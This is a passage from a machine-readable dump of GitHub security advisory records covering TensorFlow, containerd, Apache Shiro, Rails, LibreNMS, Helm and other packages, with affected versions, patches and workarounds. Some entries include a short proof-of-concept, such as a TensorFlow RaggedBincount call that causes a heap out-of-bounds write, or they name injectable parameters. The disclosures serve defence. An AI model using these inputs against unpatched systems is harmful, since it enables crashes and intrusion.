'2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h9px-9vqg-222h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29553'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/99085e8ff02c3763a0ec2263e44daec416f6a387'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:59:57Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4c7m-vv47-7c69,2021-05-12T14:55:34Z,2021-05-18T20:33:05Z,,['CVE-2020-14958'],Insecure Permissions in Gogs,"In Gogs 0.11.91, MakeEmailPrimary in models/user_mail.go lacks a ""not the owner of the email"" check.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14958'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/pull/5988'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/82ff0c5852f29daa5f95d965fd50665581e7ea3c'}]","{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T14:55:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-2vgm-wxr3-6w2j,2022-04-01T20:23:13Z,2021-05-07T15:54:23Z,,['CVE-2020-13933'],Authentication bypass in Apache Shiro,"Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13933'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:37:50Z', 'nvd_published_at': '2020-08-17T21:15:00Z'}" +1.4.0,GHSA-5pg7-v24c-9rp9,2021-04-19T22:11:46Z,2021-05-18T01:53:46Z,,['CVE-2020-28268'],Prototype pollution in controlled-merge,Prototype pollution vulnerability in 'controlled-merge' versions 1.0.0 through 1.2.0 allows attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'controlled-merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28268'}, {'type': 'WEB', 'url': 'https://github.com/hlfshell/controlled-merge/commit/5a4b2e9ffe5a0be7f8843d4ab038599d3ae5f9d4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/controlled-merge'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28268'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:11:46Z', 'nvd_published_at': '2020-11-15T23:15:00Z'}" +1.4.0,GHSA-8h46-5m9h-7553,2021-05-18T23:40:54Z,2021-05-21T14:20:51Z,,['CVE-2021-29514'],Heap out of bounds write in `RaggedBinCount`,"### Impact +If the `splits` argument of `RaggedBincount` does not specify a valid [`SparseTensor`](https://www.tensorflow.org/api_docs/python/tf/sparse/SparseTensor), then an attacker can trigger a heap buffer overflow: + +```python +import tensorflow as tf +tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ + size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ + binary_output=False) +``` + +This will cause a read from outside the bounds of the `splits` tensor buffer in the [implementation of the `RaggedBincount` op](https://github.com/tensorflow/tensorflow/blob/8b677d79167799f71c42fd3fa074476e0295413a/tensorflow/core/kernels/bincount_op.cc#L430-L446): + +```cc + for (int idx = 0; idx < num_values; ++idx) { + while (idx >= splits(batch_idx)) { + batch_idx++; + } + ... + if (bin < size) { + if (binary_output_) { + out(batch_idx - 1, bin) = T(1); + } else { + T value = (weights_size > 0) ? weights(idx) : T(1); + out(batch_idx - 1, bin) += value; + } + } + } +``` + +Before the `for` loop, `batch_idx` is set to 0. The attacker sets `splits(0)` to be 7, hence the `while` loop does not execute and `batch_idx` remains 0. This then results in writing to `out(-1, bin)`, which is before the heap allocated buffer for the output tensor. + +### Patches +We have patched the issue in GitHub commit [eebb96c2830d48597d055d247c0e9aebaea94cd5](https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are also affected. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8h46-5m9h-7553'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29514'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/eebb96c2830d48597d055d247c0e9aebaea94cd5'}]","{'cwe_ids': ['CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:40:54Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-36xw-fx78-c5r4,2021-05-27T19:46:55Z,2021-05-24T17:00:22Z,,['CVE-2020-15257'],containerd-shim API Exposed to Host Network Containers,"## Impact + +Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges. + +## Patches + +This vulnerability has been fixed in containerd 1.3.9 and 1.4.3. Users should update to these versions as soon as they are released. It should be noted that containers started with an old version of containerd-shim should be stopped and restarted, as running containers will continue to be vulnerable even after an upgrade. + +## Workarounds + +If you are not providing the ability for untrusted users to start containers in the same network namespace as the shim (typically the ""host"" network namespace, for example with `docker run --net=host` or `hostNetwork: true` in a Kubernetes pod) and run with an effective UID of 0, you are not vulnerable to this issue. + +If you are running containers with a vulnerable configuration, you can deny access to all abstract sockets with AppArmor by adding a line similar to `deny unix addr=@**,` to your policy. + +It is best practice to run containers with a reduced set of privileges, with a non-zero UID, and with isolated namespaces. The containerd maintainers strongly advise against sharing namespaces with the host. Reducing the set of isolation mechanisms used for a container necessarily increases that container's privilege, regardless of what container runtime is used for running that container. + +## Credits + +The containerd maintainers would like to thank Jeff Dileo of NCC Group for responsibly disclosing this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/master/SECURITY.md) and for reviewing the patch. + +## For more information + +If you have any questions or comments about this advisory: + + +* [Open an issue](https://github.com/containerd/containerd/issues/new/choose) +* Email us at security@containerd.io if you think you’ve found a security bug.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.3'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd/cmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd/cmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd/cmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15257'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/4a4bb851f5da563ff6e68a83dc837c7699c469ad'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.3'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNKXLOLZWO5FMAPX63ZL7JNKTNNT5NQD/'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202105-33'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4865'}]","{'cwe_ids': ['CWE-669'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T22:13:21Z', 'nvd_published_at': '2020-12-01T03:15:00Z'}" +1.4.0,GHSA-9534-h433-2rjf,2021-07-28T18:40:29Z,2021-05-07T16:28:47Z,,['CVE-2019-10808'],Improperly Controlled Modification of Dynamically-Determined Object Attributes in utilitify,utilitify prior to 1.0.3 allows modification of object properties. The merge method could be tricked into adding or modifying properties of the Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'utilitify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10808'}, {'type': 'WEB', 'url': 'https://github.com/xcritical-software/utilitify/commit/88d6e27009823338bf319ffb768fe6b08e8ad2d1,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-UTILITIFY-559497'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T18:04:07Z', 'nvd_published_at': '2020-03-11T23:15:00Z'}" +1.4.0,GHSA-qrmm-w4v4-q7f8,2021-05-05T18:45:36Z,2021-05-06T15:27:22Z,,[],Unauthorized access through URL manipulation,"### Impact +The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. + +### Patches +The vulnerability has been patched in version 1.2.65 of the `master` branch, version 1.1.113 of the 1.1.x series, and version 1.0.12 of the `stable` branch. The Docker image on docker.io has been patched. + +### Workarounds +If upgrading is not possible, manually apply the changes of https://github.com/jhpyle/docassemble/commit/e3dbf6ce054b3c0310996f0657289f5eed0a73fe and restart the server (e.g., by pressing Save on the Configuration screen). + +### Credit +The vulnerability was discovered by Jim Platania of Seiso LLC (@jimmio). + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [docassemble](https://github.com/jhpyle/docassemble/issues) +* Join the [Slack channel](https://join.slack.com/t/docassemble/shared_invite/zt-ohrn8y9z-_Fb3RAl~JPBU6Km7odBPfQ) +* Email us at [jhpyle@gmail.com](mailto:jhpyle@gmail.com) +",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'docassemble'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.65'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jhpyle/docassemble/security/advisories/GHSA-qrmm-w4v4-q7f8'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:45:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-w8qv-6jwh-64r5,2021-05-20T22:03:36Z,2021-05-24T19:52:40Z,,['CVE-2021-23364'],Regular Expression Denial of Service in browserslist,The package browserslist from 4.0.0 and before 4.16.5 are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'browserslist'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.16.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23364'}, {'type': 'WEB', 'url': 'https://github.com/browserslist/browserslist/pull/593'}, {'type': 'WEB', 'url': 'https://github.com/browserslist/browserslist/commit/c091916910dfe0b5fd61caad96083c6709b02d98'}, {'type': 'WEB', 'url': 'https://github.com/browserslist/browserslist/blob/e82f32d1d4100d6bc79ea0b6b6a2d281a561e33c/index.js%23L472-L474'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1277182'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BROWSERSLIST-1090194'}]","{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:03:36Z', 'nvd_published_at': '2021-04-28T16:15:00Z'}" +1.4.0,GHSA-g8ww-46x2-2p65,2023-08-08T15:37:20Z,2021-05-05T19:48:21Z,,['CVE-2021-22902'],Denial of Service in Action Dispatch,"Impact +------ +There is a possible Denial of Service vulnerability in Action Dispatch. Carefully crafted Accept headers can cause the mime type parser in Action Dispatch to do catastrophic backtracking in the regular expression engine. + +Releases +-------- +The fixed releases are available at the normal locations. + +Workarounds +----------- +The following monkey patch placed in an initializer can be used to work around the issue. + +```ruby +module Mime + class Type + MIME_REGEXP = /\A(?:\*\/\*|#{MIME_NAME}\/(?:\*|#{MIME_NAME})(?>\s*#{MIME_PARAMETER}\s*)*)\z/ + end +end +``` + +Patches +------- +To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. + +* 6-0-Prevent-catastrophic-backtracking-during-mime-parsin.patch - Patch for 6.0 series +* 6-1-Prevent-catastrophic-backtracking-during-mime-parsin.patch - Patch for 6.1 series + +Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. + +Credits +------- + +Thanks to Security Curious for reporting this!","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.6'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.3.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22902'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1138654'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2021-22902-possible-denial-of-service-vulnerability-in-action-dispatch/77866'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.0.3.7'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.1.3.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22902.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/_5ID_ld9u1c'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:47:37Z', 'nvd_published_at': '2021-06-11T16:15:00Z'}" +1.4.0,GHSA-jjr8-m8g8-p6wv,2021-05-18T16:32:31Z,2021-05-21T14:26:58Z,,['CVE-2021-29592'],Null pointer dereference in TFLite's `Reshape` operator,"### Impact +The fix for [CVE-2020-15209](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15209) missed the case when the target shape of `Reshape` operator is given by the elements of a 1-D tensor. As such, the [fix for the vulnerability](https://github.com/tensorflow/tensorflow/blob/9c1dc920d8ffb4893d6c9d27d1f039607b326743/tensorflow/lite/core/subgraph.cc#L1062-L1074) allowed passing a null-buffer-backed tensor with a 1D shape: + +```cc +if (tensor->data.raw == nullptr && tensor->bytes > 0) { + if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { + // In general, having a tensor here with no buffer will be an error. + // However, for the reshape operator, the second input tensor is only + // used for the shape, not for the data. Thus, null buffer is ok. + continue; + } else { + // In all other cases, we need to return an error as otherwise we will + // trigger a null pointer dereference (likely). + ReportError(""Input tensor %d lacks data"", tensor_index); + return kTfLiteError; + } +} +``` + +### Patches +We have patched the issue in GitHub commit [f8378920345f4f4604202d4ab15ef64b2aceaa16](https://github.com/tensorflow/tensorflow/commit/f8378920345f4f4604202d4ab15ef64b2aceaa16). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jjr8-m8g8-p6wv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29592'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f8378920345f4f4604202d4ab15ef64b2aceaa16'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:32:31Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-h59f-p56g-g75v,2021-04-05T20:39:08Z,2021-05-06T18:53:02Z,,['CVE-2020-35700'],SQL Injection in librenms,A second-order SQL injection issue in Widgets/TopDevicesController.php (aka the Top Devices dashboard widget) of LibreNMS before 21.1.0 allows remote authenticated attackers to execute arbitrary SQL commands via the sort_order parameter against the /ajax/form/widget-settings endpoint.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35700'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/issues/12405'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/pull/12422'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/blob/master/app/Http/Controllers/Widgets/TopDevicesController.php'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/releases/tag/21.1.0'}, {'type': 'WEB', 'url': 'https://www.horizon3.ai/disclosures/librenms-second-order-sqli'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T20:39:08Z', 'nvd_published_at': '2021-02-08T09:15:00Z'}" +1.4.0,GHSA-fw2f-7f87-5r6c,2021-07-29T18:14:19Z,2021-05-17T21:00:29Z,,['CVE-2020-7674'],Improper Input Validation in access-policy,access-policy through 3.1.0 is vulnerable to Arbitrary Code Execution. User input provided to the `template` function is executed by the `eval` function resulting in code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'access-policy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7674'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ACCESSPOLICY-571490'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T17:15:59Z', 'nvd_published_at': '2020-06-10T16:15:00Z'}" +1.4.0,GHSA-q8q8-93cv-v6h8,2021-05-24T21:15:16Z,2021-05-27T18:44:56Z,,['CVE-2020-11013'],Lookup function information discolosure in helm,"The Helm core maintainers have identified an information disclosure vulnerability in Helm 3.0.0-3.1.2. + +### Impact + +`lookup` is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. + +The documented behavior of `helm template` states that it does not attach to a remote cluster. However, as the recently added `lookup` template function circumvents this restriction and connects to the cluster even during `helm template` and `helm install|update|delete|rollback --dry-run`. The user is not notified of this behavior. + +Running `helm template` should not make calls to a cluster. This is different from `install`, which is presumed to have access to a cluster in order to load resources into Kubernetes. Helm 2 is unaffected by this vulnerability. + +A malicious chart author could inject a `lookup` into a chart that, when rendered through `helm template`, performs unannounced lookups against the cluster a user's `KUBECONFIG` file points to. This information can then be disclosed via the output of `helm template`. + +### Patches + +This issue has been fixed in Helm 3.2.0 + +### Workarounds + +Due to another bug (also fixed in Helm 